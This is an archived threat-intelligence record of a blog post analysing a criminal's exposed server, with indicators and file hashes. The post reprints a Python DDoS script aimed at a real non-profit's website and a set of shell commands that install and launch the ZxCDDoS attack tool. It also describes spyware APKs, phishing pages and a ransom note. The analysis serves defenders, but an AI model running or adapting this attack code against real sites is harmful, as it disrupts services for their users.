{
	"id": "1614d6da-a9fb-4a59-a5f1-ed007548a635",
	"created_at": "2026-04-06T00:09:34.205779Z",
	"updated_at": "2026-04-10T13:11:30.828179Z",
	"deleted_at": null,
	"sha1_hash": "ea4dd158480097d5209aa1a5c71de341111cf34d",
	"title": "Inside a Cybercriminal’s Server: DDoS Tools, Spyware APKs, and Phishing Templates",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 7121371,
	"plain_text": "Inside a Cybercriminal’s Server: DDoS Tools, Spyware APKs, and\r\nPhishing Templates\r\nPublished: 2024-10-08 · Archived: 2026-04-05 19:03:46 UTC\r\nTABLE OF CONTENTS\r\nIntroduction · DDoS Tools Overview · SpyNote APKs · Phishing Pages · Ransomeware? · Final Thoughts · Network Observables · Host Observables (*Executable \u0026 ransomware-related files only.)\r\nIntroduction\r\nDuring a recent investigation, we uncovered a cybercriminal's exposed server containing DDoS scripts, SpyNote\r\nspyware disguised as popular apps, phishing pages targeting digital currency companies and messaging platforms,\r\nand ransom notes hinting at ransomware delivery. This find gave us a unique opportunity to examine the tools\r\nthese criminals rely on and the types of victims they choose.\r\nIn today's post, we'll discuss the discovered files and illuminate the tactics and strategies used to target\r\nunsuspecting networks.\r\nDDoS Tools Overview\r\nWe'll start our investigation of the server with the DDoS tools ddos.py and ddos.txt. The Python script is\r\ndesigned (albeit poorly) to launch a denial-of-service attack against the website aisrael[.]org.\r\nThe target website is a non-profit organization established in 1999 to promote accessibility and inclusion for\r\npeople with disabilities and the elderly in Israel.\r\nddos.py attempts to overwhelm the server by sending a large number of HTTP requests using the requests library\r\nin rapid succession. While the code itself is rudimentary and contains errors, the intent is clear: to disrupt access to\r\nthe targeted site by exhausting its resources. 
The program opens with a simplistic ASCII banner displaying \"DDoS\r\nAttack.\"\r\nThe code for ddos.py is below:\r\nimport threading\r\nimport requests\r\nimport pyfiglet\r\nimport time\r\nZ = '\\033[1;31m' # أحمر (red)\r\nB = '\\033[1;34m' # أزرق (blue)\r\nL = '\\033[1;33m' # أصفر (yellow)\r\nX = '\\033[0m'\r\nlogo = pyfiglet.figlet_format('DDOS Attack')\r\nhttps://hunt.io/blog/inside-a-cybercriminal-s-server-ddos-tools-spyware-apks-and-phishing-pages\r\nPage 1 of 14\n\nprint(Z + logo + Z)\r\nurl = \"https://aisrael.org/\" # رابط الهدف (target link)\r\nthreads = 100000000000000000000000000\r\nprint(f'{B}-----------------------')\r\ndef text(string):\r\n    for char in string:\r\n        print(char, end=\"\", flush=True)\r\n        time.sleep(10 / 1000)\r\ndef send_request():\r\n    while True:\r\n        try:\r\n            response = send_request.get(url)\r\n            print(f\"DDOS Attack : {response.status_code}\")\r\n        except requests.exceptions.RequestException as e:\r\n            print(f\"Error: {e}\")\r\nfor i in range(threads):\r\n    thread = threading.Thread(target=send_request)\r\n    thread.start()\r\nCode content of ddos.py\r\nDespite its flaws, ddos.py reflects a straightforward approach to causing service disruption, relying on the sheer\r\nvolume of requests to impact server performance. 
Although not sophisticated, this tool demonstrates the\r\ncapabilities of less experienced threat actors.\r\nNotably, the script also has several comments written in Arabic, which could indicate potential attribution to an\r\nArabic-speaking actor or someone who can use Google Translate.\r\nUnlike ddos.py, ddos.txt contains a series of Bash commands designed to prepare a server environment to\r\ndownload a DDoS program from a public GitHub repository.\r\nThe repo is titled \"ZxCDDoS,\" originally uploaded by user hoaan1995 and billed as an educational tool.\r\nFigure 1: Snippet of ZxCDDoS GitHub repository README\r\nddos.txt:\r\nDebain, Ubuntu (Ubuntu 20.04 better):\r\nsudo apt-get install git -y\r\nsudo apt-get install golang -y\r\nsudo apt-get install perl -y\r\nsudo apt-get install python3 -y\r\nsudo apt-get install python2 -y\r\nsudo apt-get install python3-pip -y\r\ncurl -sL https://deb.nodesource.com/setup_16.x | sudo -E bash -;sudo apt -y install nodejs\r\nHow to use:\r\n- Recommended in shell of google, azure,...\r\n- Using vps with high speed will be stronger\r\ngit clone https://github.com/hoaan1995/ZxCDDoS/\r\ncd ZxCDDoS/\r\nnpm i requests https-proxy-agent crypto-random-string events fs net cloudscraper request hcaptcha-solver randomstring cluste\r\npip3 install -r requirements.txt\r\nwget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb\r\napt-get install ./google-chrome-stable_current_amd64.deb\r\nulimit -n 999999\r\nchmod 777 *\r\npython3 c2.py\r\n212.219.15.12\r\nhttps://www.jcie.org.uk/content/content.aspx?ID=26\r\nCommands of ddos.txt\r\nddos.txt starts with instructions for installing various dependencies on Debian/Ubuntu systems, such as Git,\r\nGolang, and Python. 
The ZxCDDoS tool and necessary Python and Node.js libraries are downloaded upon\r\ncompletion.\r\nThese commands suggest the attacker aims to streamline the setup process, making it easy to launch an attack by\r\nproviding all the necessary components in a ready-to-use format.\r\nSpyNote APKs\r\nChrome.apk and Telegram(3).apk exhibit typical capabilities associated with the SpyNote spyware family. Due to\r\nthis routine behavior, we won't analyze these files.\r\nWhat is worth noting are the C2s used by these malicious apps. Chrome.apk connects to an IP address\r\n(142.93.113[.]245:7771) hosted on Digital Ocean, while the fake Telegram APK communicates with the open\r\ndirectory that is the subject of this blog on the same port.\r\nThe third APK, rn.apk, disguised as an app called \"Education Hub,\" presents an interesting deviation from the\r\ntypical SpyNote malware characteristics seen in the other samples. Unlike Chrome.apk and Telegram(3).apk,\r\nrn.apk is not detected as SpyNote malware according to VirusTotal but is flagged as standard riskware instead.\r\nRiskware generally refers to software that may not be inherently malicious but poses security risks due to how it\r\ncan be exploited.\r\nFigure 2: Triage replay screenshot of rn.apk (Triage)\r\nWhile the other APKs engage in malicious activities, rn.apk operates under a different category, potentially using\r\npermissions or features that could be abused by a threat actor to access sensitive information.\r\nDespite the lack of observable C2 communication and specific SpyNote detection for rn.apk, its presence within\r\nthe threat actor's toolkit points to a more expansive strategy. 
The actor demonstrates a broad targeting approach by\r\ntargeting users of widely trusted applications like Chrome and Telegram and those searching for educational\r\nresources.\r\nA wide net was likely purposefully cast, increasing the likelihood of compromising diverse user groups and\r\nexpanding the overall attack surface.\r\nPhishing Pages\r\nAs mentioned in the introduction, the HTML pages on the server impersonate login interfaces for various\r\norganizations, aiming to steal credentials and sensitive information. The targets include:\r\nBinance\r\nWeChat\r\nCoinbase\r\nKraken\r\nThe HTML source code of most malicious login pages references EagleSpy, an Android RAT that allows\r\nattackers to steal login credentials, manipulate the victim's screen, and more.\r\nFigure 3: HTML source of one of the phishing pages referencing EagleSpy malware\r\nFigure 4: Screenshot of binance.html, designed for mobile devices\r\nFigure 5: kraken.html, malicious login page\r\nFigure 6: wechat.html. The message in Chinese is: \"Unauthorized detected Please verify WeChat payment\r\npassword to access the app\"\r\nTwo additional web pages mimic native mobile phone unlock screens, such as pattern and PIN entry prompts.\r\nWhen unsuspecting users enter their unlock pattern or PIN, the information is sent to an unidentified Telegram\r\naccount.\r\nStealing device credentials would allow the attacker to remotely unlock the device to access sensitive apps, data,\r\nand accounts. 
Additionally, this information can be used to lock the victim's device, effectively holding it hostage\r\nuntil a ransom is paid.\r\nFigure 7: Screenshot of pin.html. Targeting Russian speakers, the message can be translated to \"Enter the pin\r\ncode\"\r\nFigure 8: Screenshot of pattern.html. When machine-translated from Russian, the message reads, \"Screen\r\nUnlock Pattern\"\r\nRansomeware?\r\nWithin the \"ransomeware\" folder are two HTML files, crypto.html and ransomware.html. The latter consists of a\r\nsplash screen with an animation that says, \"Oops! Your Phone has been hacked!\" At the bottom of the screen is an\r\n\"UNLOCK\" button that redirects users to crypto.html.\r\nFigure 8: Animated screen informing the victim their phone has been hacked\r\nLikely, crypto.html is still a work in progress, as the included QR code in the ransom note does not lead to a\r\nwebsite, and the default wallet type, \"USDT TRC20,\" contains what appears to be a wallet address of\r\n\"bc1qwqfp5hhpqjm8lq5rfp.\"\r\nHowever, the address resembles a Bech32 Bitcoin address, not a valid USDT TRC20 one.\r\nThe note demands the victim \"PAY 7K$ in BTC\" at the top of the page and then asks for $9k within two hours to\r\nprevent the stolen information from being uploaded to the Dark web.\r\nFigure 9 shows a screenshot of crypto.html.\r\nFigure 9: crypto.html ransom note displayed after clicking unlock\r\nFinal Thoughts\r\nIn this blog post, we explored the inner workings of a cybercriminal's server, uncovering malicious tools 
to disrupt\r\nservices and compromise mobile users. From DDoS scripts designed to overwhelm targets like aisrael.org to\r\nmobile spyware such as SpyNote and EagleSpy, the server revealed a broad scope of criminal activity.\r\nTo uncover potential cyber threats among the thousands of open directories the Hunt platform is tracking, request\r\na free demo today.\r\nNetwork Observables\r\nIP Address | ASN | Ports Open | Domain(s) | Notes\r\n137.184.53.152:443 | DigitalOcean | 443, 5357, 7771, 47001 | N/A | Open directory containing malicious files.\r\n142.93.113[.]245:7771 | DigitalOcean | 22, 135, 445, 5985, 7771 | N/A | C2 for Chrome.apk\r\nHost Observables\r\n*Executable \u0026 ransomware-related files only.\r\nFile Name | SHA-256 Hash | Notes\r\ncrypto.html | 7154e3d34508eb20ac372a65aca79b716398ff8be08cd53619c90f1d71e7e43c | Ransom note\r\nransomware.html | 979047adffa36a68f41d95e5ed28b2bf77592419636c16f3fb888f8c57555bb2 | \r\nChrome.apk | 98d8e7539a94c278b1ba4a537953e74d03483f88ecb06f5c78038933d8e4b1d3 | Spynote sample spoofing Chrome browser.\r\nTelegram(3).apk | ef5ee8cefc7f68680824fff6f8435bd857a0befca8b8dd534a23116bc5c340ed | Spynote sample spoofing Telegram app.\r\nTest(12).apk | e509059e222b1c30c00854d44aaf8c7450cb5a2b7c39750ff2519e759952ba2a | Spynote.\r\nddos.py | 6613f6fcc52a2027e822f32f73d94a32b098eaf686dc059ed79fbe35f1afd35f | Python DDoS script targeting Israeli website.\r\nddos.txt | d2047e97aa22d77f9946b60f846c8728c4fbd6a6b87013d47458f289db6a4e1f | Bash commands to download open-source DDoS software, ZxCDDoS.\r\nrn.apk | ee4db5932813e8ea41779f00398bad0e98cc4536c5b88eaa3a902aac27340a18 | \r\nSource: https://hunt.io/blog/inside-a-cybercriminal-s-server-ddos-tools-spyware-apks-and-phishing-pages",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://hunt.io/blog/inside-a-cybercriminal-s-server-ddos-tools-spyware-apks-and-phishing-pages"
	],
	"report_names": [
		"inside-a-cybercriminal-s-server-ddos-tools-spyware-apks-and-phishing-pages"
	],
	"threat_actors": [],
	"ts_created_at": 1775434174,
	"ts_updated_at": 1775826690,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ea4dd158480097d5209aa1a5c71de341111cf34d.pdf",
		"text": "https://archive.orkl.eu/ea4dd158480097d5209aa1a5c71de341111cf34d.txt",
		"img": "https://archive.orkl.eu/ea4dd158480097d5209aa1a5c71de341111cf34d.jpg"
	}
}